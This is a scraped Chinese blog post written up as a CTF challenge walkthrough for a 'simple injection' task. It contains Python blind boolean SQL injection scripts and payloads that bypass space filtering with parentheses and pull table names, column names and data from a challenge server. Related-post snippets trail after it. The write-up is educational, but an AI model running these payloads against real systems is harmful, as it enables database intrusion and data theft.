2. 程式人生 > >Moctf---簡單註入

Moctf---簡單註入

阿新 發佈:2018-03-22
hex column port 命令 form 構造 結果 。。 etc

因為比較菜誒,所以這道題的命令讓我拼接了好久。記錄在此

放出url = http://119.23.73.3:5004/

打開後我們在後面寫?id=1既--> 技術分享圖片

當我們輸入的信息有誤後,頁面就沒有回顯了。

所以我們得到,當命令正確之後,會有hello的回顯。

我們在嘗試一下,發現他給ban了空格、sub、>等等。但是我們發現其他一些基礎的命令沒有給ban,比如“ascii,hex,select”等常規命令。所以這裏我們就要想辦法用其他方法代替空格。這裏我們采用()來代替空格。

這裏放上payload,大家自己看一看就行

還有下面是python代碼

①這個爆表名

import requests

 
import string
urll = "http://119.23.73.3:5004/?id=1‘and(length(database()))=‘1"
f1 = requests.get(urll)
content = f1.content
s = string.printable
# for i in range(10):
#     url = "http://119.23.73.3:5004/?id=1‘and(length(database()))=‘"+str(i)+""
#     f = requests.get(url)
#     if f.content != content:
#         print f.content
 

#         print i
url = "http://119.23.73.3:5004/?id=1"
def getData(url):
    r = requests.get(url)
    return r.text
def getTables():
    tables = ‘‘
    for i in range(50):
        for j in s:
            url2 = url + "‘and(select(hex(mid(group_concat(table_name)," + str(i+1) + ",1)))from(information_schema.tables)where(table_schema=database()))=‘
 
" + (j).encode(hex)
            #text = getData(url2)
            f = requests.get(url2)
            text = f.text
        
            if Hello in text:
                tables += j
                #print j
                #print tables
                break
        print tables

我們得到-->

技術分享圖片

②之後是列名

import requests
import string
urll = "http://119.23.73.3:5004/?id=1‘and(length(database()))=‘1"
f1 = requests.get(urll)
content = f1.content
s = string.printable
# for i in range(10):
#     url = "http://119.23.73.3:5004/?id=1‘and(length(database()))=‘"+str(i)+""
#     f = requests.get(url)
#     if f.content != content:
#         print f.content
#         print i
url = "http://119.23.73.3:5004/?id=1"

def getColumn():
    Column = ‘‘
    for i in range(50):
        for j in s:
            url2 = url +      "‘and(select(hex(mid(group_concat(Column_name)," + str(i+1) + ",1)))from(information_schema.columns)where(table_schema=database()and(table_name=‘do_y0u_l1ke_long_t4ble_name‘)))=‘" + (j).encode(hex)
            #text = getData(url2)
            f = requests.get(url2)
            text = f.text
        
            if Hello in text:
                Column += j
                #print j
                #print tables
                break
        print Column

得到結果

技術分享圖片

③爆數據

def getContent():
    content = ‘‘
    for i in range(50):
        for j in s:
            url2 = url + "‘and(select(hex(mid(group_concat(d0_you_als0_l1ke_very_long_column_name)," + str(i+1) + ",1)))from(do_y0u_l1ke_long_t4ble_name))=‘" + (j).encode(hex)
            #text = getData(url2)
            f = requests.get(url2)
            text = f.text
        
            if Hello in text:
                content += j
                #print j
                #print tables
                break
        print content

直接接爆出來了。

大家在寫這個題目的時候一定要註意url2的構造,,,我就是因為空格均為(),所以老搞不清裏面的東西。大家寫的時候一定要註意哦。。

還有,最後的值可以用hex比較,也可以用ascii比較。

Moctf---簡單註入

相關推薦

Moctf---簡單

hex column port 命令 form 構造 結果 。。 etc 因為比較菜誒,所以這道題的命令讓我拼接了好久。記錄在此 放出url = http://119.23.73.3:5004/ 打開後我們在後面寫?id=1既--> 當我們輸入的信息有誤後,頁面

MOCTF 簡單,記錄一下盲註腳本

字符型註入 where als 過濾 無法 語義 sql 原來 輸出 最近在練習sql註入寫腳本,記錄一下思路,剛學的and 1=1也拿出來溜溜 http://119.23.73.3:5004/?id=1 首先,沒有被過濾是正常顯示。 沒有被過濾但是查詢不到就是空白,

c#配置問題以及簡單防止sql,連接池問題,sqldatareader對象對於connection對象的釋放

c#添加引用。system configurationconfigurationManager.AppSettings[“”]<appSetings><add key=“” value=“”></appSetings><connectionStrings><

4.簡單的sql

web安全 sql註入 ctf 實驗吧 根據頁面提示,到底過濾了什麽東西?可以知道一定過濾了什麽.... 分別輸入1,2,3有對應的結果 使用‘會報錯,於是 構造常用的sql語句:1‘ and ‘1‘=‘1 沒有反應試一試1‘ and ‘1‘=‘2

5.簡單sql之2

web安全 sql註入 ctf 實驗吧 提示:有回顯的sql註入 這題其實使用上一篇博文的/**/技術即可獲得flag 上一篇博文簡單sql註入補充: 其實那題還過濾了關鍵詞加空格(只過濾一遍,所以寫兩遍即可),出題者考的是如下sql語句(空格和關鍵詞都要寫兩遍)

運用Unity實現依賴[結合簡單三層實例]

修改配置文件 unity 理論 構造 div support gis ctc 開發 一:理論部分 依賴註入:這是 Ioc 模式的一種特殊情況,是一種基於改變對象的行為而不改變類的內部的接口編程技術。開發人員編寫實現接口的類代碼,並基於接口或者對象類型使用容器註入依賴 的對象

關於簡單動態路由協議配置,,路由重分布

ket 分配 地址 bsp 創建 nds mis tracer ria 動態路由的配置記錄基於cisco模擬器 Packet Tracer Student 6.2 ,一下是實踐以及具體內容 拓撲結構基本如圖所示:   RIP協議   RIP協議現有兩個版本,v1和v2 ,

Spring.NET依賴框架學習--簡單對象

sys his sta 傳播 情況下 actor .net zip pac Spring.NET依賴註入框架學習--簡單對象註入 在前面的倆篇中講解了依賴註入的概念以及Spring.NET框架的核心模塊介紹,今天就要看看怎麽來使用Spring.NET實現一個簡單的對象註入

SQL其實很簡單,別一不留神就被利用了

SQL註入 sqlmap SQL防註入 SQL註入這個詞相信大家應該都不陌生,而且每年都會有這樣子的事情發生,下面我先帶大家回憶11年兩期起比較經典的案例事件: 1、SONY索尼事件2011年4月,著名的×××組織Anonymous***SONY一個網站,一星期後才被發現7千萬的用戶個人信息,其中

數據庫與前端的簡單建立及過濾參數

png 表達 strong 過濾 內容 分享圖片 rom news 小寫 數據庫配置:sqlin下的news表 1.最簡單的數據庫連接,無任何過濾,可以看出是個數字型註入。. ![](https://images2018.cnblogs.com/blog/139772

簡單

ces 行操作 做的 排序 了吧 表名 .org 字段 結束 在get註入中,首先在?id=n後面加一個’,進行判斷是否被過濾且通過返回錯誤查看是何種諸如類型。字符:”n’”。數字型’’’。 如果沒有被過濾就繼續使用and 1=1,and 1=2 。可以看出and是否被

實驗吧 簡單的SQL1

inf ble lag nba 實驗 .sh 關鍵詞 報錯 union 解題鏈接: http://ctf5.shiyanbar.com/423/web/ 解題思路:一, 輸入1,不報錯;輸入1‘,報錯;輸入1‘‘,不報錯。 二 , 輸入1 and 1=1,返回1

go 依賴 簡單 例子

結果 pack face type name pri inject 利用 str go 依賴註入 庫 利用庫 github.com/facebookgo/inject 例子 package main import ( "fmt" "github.com

記一次簡單的sql

-- 截圖 是否有效 src bsp 構造 mage nbsp inf 什麽是sql註入攻擊? 所謂SQL註入式攻擊,就是攻擊者把SQL命令插入到Web表單的輸入域或頁面請求的查詢字符串,欺騙服務器執行惡意的SQL命令。在某些表單中,用戶輸入的內容直接用

union的幾道ctf題,實驗吧簡單的sql1,2,這個看起來有點簡單和bugku的成績單

需要 簡單 details 9.png lmap bug 輸入數據 php 接下來 這幾天在做CTF當中遇到了幾次sql註入都是union,寫篇博客記錄學習一下。 首先推薦一篇文章“https://blog.csdn.net/Litbai_zhan

Spring 基礎知識 - 依賴

ans factory control 自己 int pac java str actor 所謂的依賴註入是指容器負責創建對象和維護對象間的依賴關系,而不是通過對象本身負責自己的創建和解決自己的依賴。 依賴註入主要目的是為了解耦,體現了一種“組合”的理念。 無論是xml配置

Spring中使用Map、Set、List、數組、屬性集合的方法配置文件

查看 main list highlight 配置 spring配置 pla lec while (1)下邊的一個Java類包含了所有Map、Set、List、數組、屬性集合等這些容器,主要用於演示spring的註入配置; [java] view plain c

SQL原理講解及防範

ant htm part 無效 快樂 日常 field users lib 原文地址:http://www.cnblogs.com/rush/archive/2011/12/31/2309203.html 1.1.1 摘要 日前,國內最大的程序員社區CSDN網站

談談PHP網站的防SQL

效果 query 數據庫服務 data sqlite nbsp lds esc informix SQL(Structured Query Language)即結構化查詢語言。SQL 註入,就是把 SQL 命令插入到 Web 表單的輸入域或頁面請求參數的查詢字符串中,在 W

spring依賴的好處

源代碼 依賴 沒有 舉例 new 打開 pri 維護 eat spring依賴註入的好處,舉例子說明 舉個例子,比如你寫Apple apple = new Apple();People people = new People();people.eat(apple); 然後